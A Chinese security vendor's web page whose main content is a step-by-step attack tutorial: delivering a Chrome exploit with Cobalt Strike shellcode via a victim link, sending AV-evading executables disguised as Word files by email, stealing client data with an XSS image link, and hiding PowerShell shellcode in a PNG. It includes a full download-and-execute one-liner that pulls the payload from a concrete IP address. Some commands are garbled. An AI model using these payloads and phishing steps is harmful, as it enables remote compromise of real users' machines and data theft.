每周安全速递³⁷¹ | 勒索软件攻击导致心理健康机构超11万人数据泄露
2026-01-06
四年同行,韧性共铸:西南某商行携手美创科技再度通过年度容灾大考
2025-12-26
以“AI+数据安全”领雁!祝贺美创牵头项目入选浙江省科技厅“尖兵领雁”计划 !
2025-12-22
美创AI灾备专家:引领灾备领域迈入“智能化”时代
2025-12-15
热点观察|美创科技丁斐:数据安全 × 价值共创?可信数据空间的 “双向奔赴”
2025-12-03
存储域
数据库加密 诺亚防勒索访问域
数据库防水坝 数据库防火墙 数据库安全审计 动态脱敏流动域
静态脱敏 数据水印 API审计 API防控 医疗防统方运维服务
数据库运维服务 中间件运维服务 国产信创改造服务 驻场运维服务 供数服务安全咨询服务
数据出境安全治理服务 数据安全能力评估认证服务 数据安全风险评估服务 数据安全治理咨询服务 数据分类分级咨询服务 个人信息风险评估服务 数据安全检查服务在这个阶段,攻击者会根据“探索发现”阶段所发现的重要信息,来对目标暴露出的攻击面进行攻击尝试,在“探索发现”阶段收集到的信息越多,攻击对象所暴露的攻击面也就越多,攻击更易成功。
安装89.0.4349.114版本的Chrome客户端

使用无沙箱模式启动Chrome客户端
"C:Usersh4nAppDataLocalGoogleChromeApplicationchrome.exe"-no-sandbox

从github上下载该漏洞的exp
https://github.com/r4j0x00/exploits/tree/master/chrome-0day

将exp放置到本地的文件夹中,然后使用浏览器访问exploit.html文件路径
成功弹出计算器,本地代码执行成功

使用Cobalt Strike生成c语言的payload

将生成的c语言payload处理后替换掉exp中的shellcode

将制作好的html文件上传到vps上,构造访问链接

将链接发给受害者,受害者点击后即可在Cobalt Strike上看到主机上线


2. 通过诱使用户下载恶意文件并打开进行攻击
使用Cobalt Strike生成c语言payload

对生成的payload进行免杀并生成.exe可执行文件

生成的可执行文件可以加入.doc、.docx等进行伪装

将恶意文件进行压缩后通过邮件、社交媒体等方式发送给受害者


当受害者接收文件并解压打开,即可在Cobalt Strike上看到主机上线

3、通过诱使用户打开恶意图片进行攻击
自行创建或注册一个XSS平台,创建一个项目

查看项目源代码,获取恶意图片链接

将恶意图片链接发送给受害者并诱使其打开

受害者使用浏览器打开恶意图片后,攻击者即可获取受害者客户端信息

除了上述可以在图片中插入javascript代码之外,还可以在图片中插入shellcode然后通过类似于dll注入的方式进行命令执行
首先使用Cobalt Strike生成一个powershell的shellcode

然后下载图片shellcode注入工具
https://github.com/dayuxiyou/Invoke-PSImage
并将注入工具、shellcode文件、待注入的图片文件放置在相同目录下

打开powershell,一次执行下列命令
Set-ExecutionPolicy Unrestricted -ScopeCurrentUser
Import-Module .Invoke-PSimage.ps1
Invoke-PSImage -Script .payload.ps1 -Image.shell.jpg -Out .shell.png -Web
会生成一张包含shellcode的图片文件,同时会生成一串powershell命令

将恶意图片放置到vps上,并替换命令中的远程图片链接
sal a New-Object;Add-Type -ASystem.Drawing;$g=a System.Drawing.Bitmap((aNet.WebClient).OpenRead("http://45.77.185.187:9991/shell.png"));$o=aByte`` 3885;(0..6)|%{foreach($xin(0..554)){$p=$g.GetPixel($x,$_);$o`$_*555+$x`=(`math`::Floor(($p.B-band15)*16)-bor($p.G-band 15))}};IEX(`System.Text.Encoding`::ASCII.GetString($o`0..3550`))
在受害者机器上执行上述命令,即可看到机器上线cs

